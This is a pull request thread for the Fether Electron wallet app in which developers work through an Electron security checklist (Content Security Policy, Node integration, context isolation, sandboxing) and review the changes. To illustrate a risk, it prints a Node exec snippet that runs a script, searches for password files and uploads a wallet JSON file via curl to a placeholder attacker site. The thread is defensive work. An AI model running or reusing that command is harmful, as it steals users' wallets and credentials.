fix: Relates to #124. Security

[ltfschoen]

• Electron Security https://electronjs.org/docs/tutorial/security
  • Latest Electron version used
  • Dependencies are trusted
    • Only use local files packaged with app to execute Node.js code.
  • Defend against XSS and Remote Code Execution (RCE) attacks - Action taken: Attempted in this PR
  • Checklist: Security Recommendations
    • Only load secure content
      • Potential issues:
        • Potential issue loading token image files fether-react/src/assets/tokens/foundation.json, since malicious DLL may be appended to the end
        • Unsecure protocols (i.e. http, ws) are allowed in fether-react/public/index.html, but may jeopardise the authenticity and integrity of the loaded resources since it won't be encrypted traffic and 'unsafe-eval' is currently required for Fether to work
      • Proposed solution (as discussed with amaurymartiny):
        • If the token images being appended with malicious DLLs is a serious concern, then we must be safe and should pre-download the token logo images. UPDATE: Only allowing https: in CSP
        • Remove http: in img-src of the CSP to be safe. Token providers will have to put their logos as https://
        • Remove ws: and http: from connect-src in the CSP. We should only allow http: and unsafe-eval in dev mode, as that's required by create-react-app
        • Connection is via ws:// to parity-ethereum https://github.com/paritytech/fether/blob/master/packages/fether-react/src/stores/parityStore.js#L77, though the connection is secure (there are the Sec-* fields in the ws connection in the network tab. Change to wss:// for safety
    • Only load secure content
      • Preload Script to be used. After disabling nodeIntegration, expose custom APIs to the later loaded website that consume Node.js modules or features using a preload scripts, since the preload script has access Node.js features like require, but then the website only has access to methods attached to the window object, but no Node.js features.
    • Disable Node.js integration and Enable contextIsolation in any renderer (i.e. BrowserWindow, BrowserView, or ) that loads remote content to limit power granted. Grant additional permissions for specific hosts (i.e. give websites we are opening such as example.com/ using BrowserWindow only the power it needs.
      • Do not load and execute remote code from untrusted sources when nodeIntegration: true or contextIsolation: false
      • "Only load secure content". Changes required in createWindow.js where we are creating instance of new BrowserWindow
      • UPDATE: See other notes as to why we cannot disable contextIsolation to to need for ipcRenderer
    • Disable Node.js integration to prevent require being available in Chrome Dev Tools Console
      • Example: Electron is Chromium and Node.js combined into a single runtime. So we need to isolate it to prevent untrusted sources being able to hijack the browser and perform XSS like the following in Developer Tools > Console, which currently has access directly with the user's file system. See https://slack.engineering/interops-labyrinth-sharing-code-between-web-electron-apps-f9474d62eccc

var exec = require('child_process').exec;
exec('cd ~; ls; touch evil.sh; bash evil.sh; echo "evil dump"; find . -name "password" -print; curl --upload-file ./ethereum-wallet.json https://myhacksite', function (error, stdout, stderr) {
  console.log('stdout: ' + stdout);
  console.log('stderr: ' + stderr);
  if (error !== null) {
    console.log('exec error: ' + error);
  }
});

• • • Investigate Chromium process sandboxing and potentially OS-level app sandboxing (for Windows, Mac, and Linux). Reference: https://slack.engineering/interops-labyrinth-sharing-code-between-web-electron-apps-f9474d62eccc. UPDATE: Separate PR if necessary
• • • Handle session permission requests from remote content
      • Custom Handler to be created to handle session permission requests from remote content - https://electronjs.org/docs/tutorial/security#4-handle-session-permission-requests-from-remote-content. UPDATE: See setPermissionRequestHandler
    • Do not disable web security (i.e. ensure webSecurity: true is set) - Action taken: explicitly enabled
    • Define a Content Security Policy (CSP). See Content-Security-Policy metatag in fether-react/public/index.html
    • Do not set allowRunningInsecureContent: true - Action taken: explicitly disabled
    • Do not enable experimental features experimentalFeatures: true - Action taken: explicitly disabled
    • Do not use enableBlinkFeatures - Action taken: explicitly disabled
    • Do not use allowpopups - Action taken: not used
    • Verify WebView Options before creation - Action taken: not used
    • Disable or limit navigation
    • Disable or limit creation of new windows
    • Do not use openExternal with untrusted content
  • Vulnerabilities published on the Electron blog mitigation
    • WebView vulnerability fix
  • Security testing. UPDATE: Separate PR and external audit
  • Electron security warnings enabled. Reference
  • Detected Electron security misconfigurations and insecure patterns using electronegativity

     npm install @doyensec/electronegativity -g;
     electronegativity -i ./packages/fether-electron/
    

  • Review Electron Security Checklist by Doyensec for potential weakness and potential bugs
  • Fix Electron Security and Deprecation Warnings that appear in the browser "Toggle Developer Tools > Console". UPDATE: To be addressed in future PR

VM19:1877 Electron Security Warning (Insecure Resources) This renderer process loads resources using insecure
  protocols.This exposes users of this app to unnecessary security risks.
  Consider loading the following resources over HTTPS or FTPS. 
 - http://localhost:3000/static/js/bundle.js
- http://localhost:3000/static/js/0.chunk.js
- http://localhost:3000/static/js/main.chunk.js

For more information and help, consult
https://electronjs.org/docs/tutorial/security.
 This warning will not show up
once the app is packaged.

VM19:1937 Electron Security Warning (Insecure Content-Security-Policy) This renderer process has either no Content Security
    Policy set or a policy with "unsafe-eval" enabled. This exposes users of
    this app to unnecessary security risks.
 
For more information and help, consult
https://electronjs.org/docs/tutorial/security.
 This warning will not show up
once the app is packaged.

• Fix all // FIXME comments in this PR. UPDATE: As many as necessary to merge the PR.

• Misc

  • Update Readme with debugging in development instructions
  • Add Webpack additions including add-ons for Webpack build notifications
  • Add Source Maps in development for debugging

• Update this summary incorporating changes since merging PR from amaurymartiny. amaurymartiny clarified that whilst we've got sandbox: true in the config the reasons why we've removed --enable-sandbox from package.json (which is supposed to sandbox all BrowserWindow instances) is because:

• We will only have that one BrowserWindow (or should restrict to only have one)

• The script where --enable-sandbox was included in package.json was for yarn electron, which is also mainly used in dev. The final binary won't have --enable-sandbox. Fether passes down --... flags to parity-ethereum (see https://github.com/paritytech/fether#passing-config-flags-to-the-underlying-parity-ethereum-node). So when run, it is as if we ran parity-ethereum --enable-sandbox --some-other-flags, which crashed parity-ethereum
  All in all, it might be easier to put sandbox: true, and limit to 1 BrowserWindow.

• We must ensure only 1 BrowserWindow is allowed.

• Fix preload.js. See amaurymartiny's issue below

  • "Uncaught Error: module not found" inside preload script electron-userland/electron-webpack#276
  • https://github.com/electron-userland/electron-webpack/blob/master/docs/en/configuration.md

• Update WS interface and port based on comments here fix: Relates to #124. Security #451 (comment)

  • LS has created WIP commit locally

• Fix isDev approach by using appIsPackaged to determine current environment, as highlighted by Amaury and Axel. See fix: Relates to #124. Security #451 (comment)

• Future - investigate https://hackmd.io/O1FA34BuSNyJoPV1Cu3L0A

• Add removal of wsInterface fix: Relates to #124. Security #451 (comment) to the release notes

[Tbaut]

Small conflict, can you resolve it @ltfschoen ?
I requested @axelchalon review because this is above my head.

edit: Sorry, just realized it's not labelled as "pleasereview".

[ltfschoen]

Thanks for reviewing it so far, but I'm still reviewing security guides and would prefer to bundle all the changes in the same PR. I've added a checklist of bulletpoints and will try and address as much as possible in the implementation. If I can't implement a security recommendation I'll add a note in the checklist.

[amaury1093]

Very nice, thanks Luke! This is crucial.

I have a couple of small comments, but overall it looks good to me

'unsafe-eval' is currently required for Fether to work

Only in dev (i.e. with yarn start). If there's a way to have different CSP by NODE_ENV, that'd be perfect.

Dev:
        default-src 'none';
        script-src http: 'unsafe-inline' 'unsafe-eval';
        connect-src http: https: ws: wss:;
        img-src 'self' 'unsafe-inline' file: data: blob: http: https:;
        style-src 'unsafe-inline' blob: file:;
        worker-src 'blob';

Prod:
        default-src 'none';
        script-src file: 'unsafe-inline';
        connect-src http: https: ws: wss:;
        img-src 'self' 'unsafe-inline' file: data: blob: http: https:;
        style-src 'unsafe-inline' blob: file:;
        worker-src 'blob';

(^ can possibly be even more strict, needs testing)

Preload Script to be used

No, we don't need preload scripts in Fether. Actually we do.

[ltfschoen]

'unsafe-eval' is currently required for Fether to work

Only in dev (i.e. with yarn start). If there's a way to have different CSP by NODE_ENV, that'd be perfect.

Dev:
        default-src 'none';
        script-src http: 'unsafe-inline' 'unsafe-eval';
        connect-src http: https: ws: wss:;
        img-src 'self' 'unsafe-inline' file: data: blob: http: https:;
        style-src 'unsafe-inline' blob: file:;
        worker-src 'blob';

Prod:
        default-src 'none';
        script-src file: 'unsafe-inline';
        connect-src http: https: ws: wss:;
        img-src 'self' 'unsafe-inline' file: data: blob: http: https:;
        style-src 'unsafe-inline' blob: file:;
        worker-src 'blob';

(^ can possibly be even more strict, needs testing)

I think you may not have pulled the latest from my branch.
I've pushed a commit that applies the CSP conditional on the NODE_ENV, but if I run it with nodeIntegration: false (uncommented) then it displays Uncaught TypeError: window.require is not a function in the Chrome Inspector > Console when I choose Toggle Developer Tools from the menu, since we've disabled use of Node.js's require, but we're using it to import Electron in fether-react package's parityStore.js file.

In my latest commit nodeIntegration: false is commented out https://github.com/paritytech/fether/pull/451/files#diff-4a03fc50a1d822fd063ef727b280fe84R91

[amaury1093]

I think you may not have pulled the latest from my branch.

Ah ok, that's possible. I'll have another look tomorrow in the morning 👍

[ltfschoen]

@amaurymartiny I've pushed commits addressing your latest review comments. I've tested that it works on Linux (Debian 8) using yarn start, yarn electron and building and running the binary

We still need to test that it works on macOS and Windows

[amaury1093]

Code lgtm!

When I was checking that it worked I create both a non-Parity Signer account plus imported...

This is expected. yarn start, yarn electron and the binary have each their own localStorage, so the signer accounts are not shared (unfortunately).

[amaury1093]

You can remove this. parity by default allows all origins in *.parity

[amaury1093]

Tiny nit (introduced recently), otherwise I'm okay to merge this 🎉 !

[amaury1093]

Why this change? This makes the pre-commit hook less performant

[ltfschoen]

Without the change it was trying to lint the .ts files and the pre-commit hook was preventing me from pushing

[amaury1093]

Also, I just noticed this: can you remove the package-lock.json?

[ltfschoen]

Unfortunately i accidently left my laptop charger in the office so may not be able to address the removal of package-lock.json until Monday

[Tbaut]

I've tested (linux) an ETH transaction and the link to blockscout was not working and invalid: https://blockscout.com/eth/kovan/tx/undefined/internal_transactions (clicking on it didn't do anything).

other than that things look good 👍

[ltfschoen]

I've tested (linux) an ETH transaction and the link to blockscout was not working and invalid: https://blockscout.com/eth/kovan/tx/undefined/internal_transactions (clicking on it didn't do anything).

other than that things look good

thanks! i've pushed a commit to fix this now

[amaury1093]

Let's merge it then! I'll test the generated binaries right after. Thanks Luke for this important PR.

[amaury1093]

AH I didn't see this, I merged too fast... @parity/* should NOT have been updated, with this update we cannot send a tx. I'll add a patch asap